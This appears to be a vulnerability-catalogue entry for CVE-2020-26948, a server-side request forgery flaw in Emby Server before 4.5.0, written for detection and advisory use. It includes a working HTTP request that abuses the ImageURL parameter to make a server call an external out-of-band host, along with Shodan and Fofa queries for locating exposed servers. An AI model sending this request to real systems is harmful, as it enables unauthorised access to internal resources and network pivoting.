🔙 목록으로 돌아가기

CVE-2020-26948: Emby < 4.5.0 - Server Server-Side Request Forgery

TitleEmby < 4.5.0 - Server Server-Side Request Forgery
Authordwisiswant0
SeverityCritical
ImpactAn attacker can exploit this vulnerability to access internal resources, perform port scanning, and potentially pivot to other systems.
RemediationApply the latest security patches or upgrade to a patched version of Emby Server.
CVSS Score9.8
EPSS Score0.91735
CVE IDCVE-2020-26948
CWE IDCWE-918
Shodan Queryhttp.title:"emby"
Fofa Querytitle="emby"
Tags cve2020 cve emby jellyfin ssrf vuln vkev

🔍 Vulnerability Description

Emby Server before 4.5.0 allows server-side request forgery (SSRF) via the Items/RemoteSearch/Image ImageURL parameter.

🌐 HTTP Request

GET /Items/RemoteSearch/Image?ProviderName=TheMovieDB&ImageURL=http://oast.fun HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.5.1 Safari/605.1.15
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2020/CVE-2020-26948.yaml

🦈 Packet Capture: ⬇️ Download cve-2020-26948.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A